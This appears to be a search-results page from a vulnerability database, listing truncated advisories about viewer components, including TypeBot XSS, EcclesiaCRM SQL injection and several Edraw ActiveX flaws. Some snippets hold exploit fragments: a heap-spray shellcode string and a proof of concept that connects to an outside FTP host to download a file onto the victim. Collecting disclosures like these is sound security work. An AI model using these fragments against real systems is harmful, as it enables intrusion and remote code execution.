33 matches found
CVE-2026-39964
TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor's browser...
EUVD-2026-23823
A flaw has been found in phili67 Ecclesia CRM up to 8.0.0. This affects the function ValidateInput of the file /v2/query/view/ of the component Query Viewer Component. This manipulation of the argument custom causes sql injection. The attack can be initiated remotely. The exploit has been publish...
CVE-2026-6628
A flaw has been found in phili67 Ecclesia CRM up to 8.0.0. This affects the function ValidateInput of the file /v2/query/view/ of the component Query Viewer Component. This manipulation of the argument custom causes sql injection. The attack can be initiated remotely. The exploit has been publish...
EcclesiaCRM Security Vulnerability
EcclesiaCRM is a customer relationship management software for church management, developed by the French individual phili67. Versions of EcclesiaCRM 8.0.0 and earlier contained security vulnerabilities. These vulnerabilities were caused by improper handling of the custom parameter in the...
EUVD-2021-19897
Malware in sbrugna...
Open Design Alliance Drawings SDK Security Vulnerability
Open Design Alliance Drawings SDK is a software development kit for drawing design applications from Open Design Alliance, Inc. The Open Design Alliance Drawings SDK contains a security vulnerability that results from an exception vulnerability in the sample The ODA Viewer continues to process...
Synology DiskStation Manager Path Traversal Vulnerability (CNVD-2021-39156)
Synology DiskStation Manager (DSM) is an operating system for use on network storage servers (NAS) from Synology Inc. of Taiwan, China. This operating system manages information such as data, files, photos, music, and more. A path traversal vulnerability exists in the PDF Viewer component of Synology...
Unspecified Vulnerability in Oracle Fusion Middleware Oracle Discoverer Component (CNVD-2016-10058)
Oracle Fusion Middleware is Oracle's business innovation platform for enterprise and cloud environments, which provides middleware, software collections, etc. Oracle Discoverer is one of the querying of a variety of information, generating reports, and Web...
Mozilla: Same origin violation and local file stealing via PDF reader (MFSA 2015-78)
A flaw was discovered in Mozilla Firefox that could be used to violate the same-origin policy and inject web script into a non-privileged part of the built-in PDF file viewer PDF.js. An attacker could create a malicious web page that, when viewed by a victim, could steal arbitrary files including...
PDF Viewer Component ActiveX DoS
No description provided by source. Title : PDF Viewer Component ActiveX DoS Author : Senator of Pirates E-Mail : [email protected] FaceBook : FaceBook.Com/SenatorofPirates Software link : http://www.ocxt.com/download/PDFViewerSetup.exe Date : 05/02/2012 Tested : Windows Xp SP3 EN...
Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln
No description provided by source. Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vendor: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: Edraw PDF Viewer Component is a light...
Design/Logic Flaw
The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edraw Office Viewer Component, the client in IBM Cognos Disclosure Management (CDM) 10.2.0, and other products, allows remote attackers to read arbitrary files, or download an arbitrary program onto a client machine and execute this...
EdrawSoft Office Viewer Component ActiveX 5.6 Buffer Overflow
EdrawSoft Office Viewer Component ActiveX 5.6 officeviewermme.ocx BoF PoC Vendor: EdrawSoft Product web page: http://www.edrawsoft.com Affected version: 5.6.5781 Summary: Edraw Office Viewer Component contains a standard ActiveX control that acts as an ActiveX document container for hosting Offic...
Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow
Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow function heapspray //exec calc.exe var shellcode = unescape "%u9090%u9090%u9090%u9090" ; shellcode += unescape...
Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow
function heapspray //exec calc.exe var shellcode = unescape "%u9090%u9090%u9090%u9090" ; shellcode += unescape...
Design/Logic Flaw
Insecure method vulnerability in the PDFVIEWER.PDFViewerCtrl.1 ActiveX control (pdfviewer.ocx) in Edraw PDF Viewer Component before 3.2.0.126 allows remote attackers to create and overwrite arbitrary files via a URL argument to the FtpConnect method and a target filename argument to the...
CVE-2009-2169
CVE-2009-2169: In Edraw PDF Viewer Component, the PDFVIEWER.PDFViewerCtrl.1 ActiveX control (pdfviewer.ocx) before 3.2.0.126 contains an insecure method vulnerability. An attacker can remotely create and overwrite arbitrary files by passing a URL argument to FtpConnect and a target filename to Ft...
Edraw PDF Viewer Component Code Execution
Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vendor: EdrawSoft Affected: Edraw PDF Viewer Component target.FtpConnect "ftp://192.168.220.201", "test", "tester" target.FtpDownloadF...
[Full-disclosure] Edraw PDF Viewer Component ActiveX Remote code execution vulnerability
Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vendor: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: "Edraw PDF Viewer Component is a light weight ActiveX Control which...
Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method vulnerability
No description provided by source. Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vendor: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: "Edraw PDF Viewer Component is a ligh...